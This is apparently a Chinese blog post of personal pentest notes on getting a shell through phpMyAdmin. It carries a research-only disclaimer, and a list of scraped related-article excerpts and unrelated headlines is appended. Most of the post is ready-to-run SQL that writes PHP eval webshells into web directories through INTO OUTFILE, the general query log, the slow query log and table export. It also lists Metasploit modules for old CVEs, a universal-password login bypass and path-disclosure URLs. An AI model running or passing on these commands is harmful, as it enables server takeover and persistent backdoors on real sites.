phpmyadmin getshell

  • 前言
    • 一、into outfile写马
      • 条件
    • 利用方法
      • 操作
    • 二、开启日志写马getshell
      • 条件
      • 利用方法
      • 操作
    • 三、慢查询webshell
      • 利用方法
      • 操作
    • 四、创建数据库和表写入webshell
      • 条件
      • 利用方法
  • 特殊版本getshell

所有文章,仅供安全研究与学习之用,后果自负!

前言

phpMyadmin是一个以PHP为基础的MySQL数据库管理工具,使网站管理员可通过Web接口管理数据库。

虽然网上有很多公开的文章,也用过很多次了,但自己再总结一遍方便自己查阅。

一、into outfile写马

条件

1.对web目录需要有写权限能够使用单引号
2.secure_file_priv 不为null  具体描述在下边。
3.要知道网站的绝对路径,写入马才能连接。mysql   into写入文件:使用需看要secure_file_priv的值。value为“null”时,不允许读取任意文件value为其余路径时,表示该路径可以读写文件value为“空”时,允许读取任意文件

利用方法

先根据各种信息收集 判断或猜测出网站的绝对路径

比如 如果是 phpstudy启动的 根据 mysql 安装路径 就可以猜出网站的位置

如果是 linux 一般位于 /var/www/html

select @@basedir;  查找mysql安装路径show global variables like '%secure_file_priv%';
NULL    不允许导入或导出
/tmp    只允许在 /tmp 目录导入导出
空      不限制目录如果有权限
select '<?php @eval($_POST[a]);?>'INTO OUTFILE '/var/www/html/shell.php'

操作

根据 下图 得知 是linux 系统 猜测网站位置在 /var/ww/html

查看可不可以写文件


将shell.php的马写在网站pma/目录下

蚁剑连接成功

二、开启日志写马getshell

条件

用于 secur_file_priv 为null 或限定值 不在网页目录时

general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面写入内容的话,那么就可以成功 getshell:

general_log:日志保存状态
general_log_file:日志保存路径

利用方法

SHOW VARIABLES LIKE 'general%';  # 查看general_log 是否开启
set global general_log = "ON";      # 开启
set global general_log_file='F:/phpStudy/WWW/shell.php';
select '<?php eval($_POST["pwd"]);?>'

执行完毕后 直接用蚁剑连接

操作





均执行成功

三、慢查询webshell

利用方法

show variables like '%slow%'
set global slow_query_log=on;
set global slow_query_log_file='/var/www/html/pma/slow.php'
select '<?php phpinfo();?>' or sleep(10);

操作



不知道为什么 被拒绝访问

四、创建数据库和表写入webshell

条件

Root数据库用户(root权限);
网站绝对路径(确定有写入权限);
secure_file_priv没有具体值。

利用方法

建库

建表


建字段

插入数据 一句话木马

<?php eval($_POST[pwd]); ?>'


执行SQL查询,将该表中的内容导出到指定文件
物理路径为"/var/www/html/pma"

use test; 连接test数据库
select * from test_table into outfile "/var/www/html/pma/shell.php";


连接成功

最后删除该库
drop database test;

或者用命令也可以 执行

执行下面的sql语句,创建表并在表中写入一句话木马,在导出到网站的根路径。

CREATE TABLE test( id text(500) not null);    INSERT INTO test (id) VALUES('<?php @eval($_POST[cmd]);?>');    SELECT id FROM test INTO OUTFILE 'C:/phpstudy/WWW/1.php';    DROP TABLE IF EXISTS test;

特殊版本getshell

CVE-2013-3238

影响版本:3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 ANYUN.ORG
利用模块:exploit/multi/http/phpmyadminpregreplace
CVE-2012-5159

影响版本:phpMyAdmin v3.5.2.2
利用模块:exploit/multi/http/phpmyadmin3522_backdoor
CVE-2009-1151

PhpMyAdmin配置文件/config/config.inc.php存在命令执行

影响版本:2.11.x < 2.11.9.5 and 3.x < 3.1.3.1
利用模块:exploit/unix/webapp/phpmyadmin_config
Top
弱口令&万能密码
弱口令:版本phpmyadmin2.11.9.2,直接root用户登陆,无需密码
万能密码:版本2.11.3 / 2.11.4,
用户名

'localhost'@'@"

则登录成功

phpMyAdmin暴路径办法:

phpMyAdmin/libraries/select_lang.lib.phpphpMyAdmin/darkblue_orange/layout.inc.phpphpMyAdmin/index.php?lang[]=1phpmyadmin/themes/darkblue_orange/layout.inc.php

例如: 2.11.3 版本

http://192.168.157.156/phpmyadmin/themes/darkblue_orange/layout.inc.php

参考
https://www.cnblogs.com/sunny11/p/13581470.html#_label2

这篇文章 总结很全 可以参考

https://www.cnblogs.com/liliyuanshangcao/p/13815242.html?ivk_sa=1024320u
https://baijiahao.baidu.com/s?id=1714241661462813554&wfr=spider&for=pc

phpmyadmin getshell相关推荐

  1. phpmyadmin getshell总结

    前言 phpMyAdmin 是一个用PHP编写的开源软件工具,可以通过web方式控制和操作MySQL数据库.通过phpMyAdmin 可以完全对数据库进行操作,例如建立.复制和删除数据等. phpmy ...

  2. phpmyadmin getshell的四种方法

    phpmyadmin常见的getshell的几种方法,一共是四种:1.日志文件写 shell2.在知道绝对路径的情况下,利用INTO OUTFILE 3.慢查询写入webshell4.创建数据库和表写 ...

  3. php如何用菜刀连接getshell,phpmyadmin之getshell总结

    title: phpmyadmin中getshell的几种姿势 1,利用全局变量general_log去getshell show variables like '%general%'; 然后将gen ...

  4. phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613 漏洞复现

    phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613 漏洞复现 一.漏洞描述 二.漏洞影响 三.漏洞复现 1.环境搭建 2.漏洞复现 方法一:命令执行 方法二:phpMyAdm ...

  5. mysql低权限用户getshell_GetShell的姿势总结

    原文来自SecIN社区-作者:WiHat 0x00 什么是WebShell 渗透测试工作的一个阶段性目标就是获取目标服务器的操作控制权限,于是WebShell便应运而生.Webshell中的WEB就是 ...

  6. php $_post 报错,关于php输入$_post[‘’]报错的原因

    eclipse 启动到loading workbench... 自动关闭 是由于项目没有正常关闭运行而导致"workbench.xmi"中的"persistedState ...

  7. 红日靶场vulnstack1 内网渗透学习

    目录 前言: 信息收集: phpmyadmin getshell 日志写shell yxcms getshell 植入后们: 内网域环境信息收集: 基于msf 进行信息收集: 基于msf 内网信息收集 ...

  8. 【网络安全面经】渗透面经、安服面经、红队面经、hw面经应有尽有 这一篇真的够了

    目录 面经 牛客 奇安信面经(五星推荐) 牛客面经(推荐) 渗透测试面经(推荐) 渗透测试技巧 计网面经 SQL注入漏洞 注入绕过 XXE漏洞 最强面经 Github面经 模拟面 WEB安全 PHP安 ...

  9. 漏洞:阿里云盾phpMyAdmin =4.8.1 后台checkPageValidity函数缺陷可导致GETSHELL

    阿里云盾提示phpMyAdmin <=4.8.1会出现漏洞有被SHELL风险,具体漏洞提醒: 标题 phpMyAdmin <=4.8.1 后台checkPageValidity函数缺陷可导 ...

最新文章

  1. 新闻媒体的“社会热点事件”催发微博客的诞生
  2. [BZOJ3093][Fdu校赛2012] A Famous Game(不等概率)
  3. P6242-[模板]线段树3【吉司机线段树】
  4. 一文读懂深度学习:从神经元到BERT
  5. 神奇的go语言(image网站开发)
  6. ASP.NET MVC模型绑定int超出范围时
  7. 应用管理系列 — 怎么管理Sybase数据库
  8. Tensorflow Python3 做神经网络(视频教程)
  9. Element-UI中Select选择器讲解(el-select详解)
  10. DotNetCore CAP
  11. 天龙微信游戏找服务器,《天龙八部3》微信公众号积分系统维护公告
  12. Snapper:通过同义、分类关键词快速定位并调用WAV文件
  13. java mongodb json_java向mongoDB中插入Json
  14. sort函数的用法(C++排序库函数的调用)对数组进行排序,在c++中有库函数帮我们实现,这们就不需要我们自己来编程进行排序了。
  15. AKA传奇和亚嵌那些事
  16. 启发:vs运行时提示:应用程序无法正常启动(oxc000007b)。请单击确定关闭应用程序
  17. 小米手机显示服务器已满,小米云空间不足怎么办 小米云服务空间已满官方解决方案...
  18. OSG 之学习五:OSG 漫游
  19. ansible批量免密
  20. Python地学分析 — GDAL对遥感影像重投影

热门文章

  1. Typora图片上传到CSDN
  2. [SSD科普之2] SATA、mSATA、M.2、M.2(NVMe)、PCIE固态硬盘接口详解
  3. Tkinter 实现弹出子窗口并冻结主窗口
  4. 空中网的logo变成了俏江南
  5. 如果流星拖着长长的尾
  6. 能根据姓名和身份证号找到计算机准考证号吗?
  7. 爪哇oj--数组查找及替换
  8. 无论三星赢得多少用户的心,我都认为这家企业用的是旁门左道在经营
  9. appium自动化脚本之自动安装apk包到手机
  10. python 数据可视化———绘制饼状图(bar)